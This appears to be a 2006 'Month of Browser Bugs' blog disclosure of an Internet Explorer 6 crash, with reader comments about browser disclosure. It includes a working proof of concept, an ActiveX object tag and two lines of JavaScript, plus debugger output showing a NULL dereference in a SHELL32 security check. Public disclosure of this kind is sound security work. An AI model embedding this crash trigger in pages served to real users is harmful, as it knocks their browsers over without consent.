MoBB #15: FolderItem Access
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Accessing the object reference of this control triggers a NULL dereference in the security check :-)
<object id="target" classid="clsid:FEF10FA2-355E-4e06-9381-9B24D7F7CC88">
</object>
var a = document.getElementById('target');
alert(a.object);
Demonstration
eax=0000eb6c ebx=00000000 ecx=00000000
edx=09105b62 esi=0013b1ac edi=03cec120
eip=7cb86ce4 esp=0013aee4 ebp=0013b184
SHELL32!CFolder::_SecurityCheck:
7cb86ce4 83790c00 cmp dword ptr [ecx+0xc],0x0 ds:0023:0000000c=????????
This bug will be added to the OSVDB:
Microsoft IE FolderItem Object NULL Dereference
posted by hdm @ 9:41 PM
4 comments
links to this post
4 Comments:
can you please stop with the IE "fillers"?
we alle know that the IE is kinda... scary?
I am using konqueror (3.5.3)
and I would like to hear more konqueror crashs, in order to make konqueror better =)
Perhaps IE is the only browser coughing up fuzz... Scroll back a little and you'll see that Firefox had a hit.
That said, I do wonder just how much of a fuzz filling the other browsers are taking. A little detail in the testing regime would be nice.
I dunno. I'm digging on these vulnerabilities. It's quite eye opening when you consider the potential for mishief. :)
And thats what this is about anyway. Waking up the companies responsible for fixing these bugs and showing the world what they have known for awhile and are still not fixing.
IE 6 is STILL a supported platform and considering the fact that IE7 is only going to be released for Vista, they are going to be supporting this for a long time to come.
fwiw, IE7 will run on XP, as well
Post a Comment
Links to this post:
Create a Link
<< Home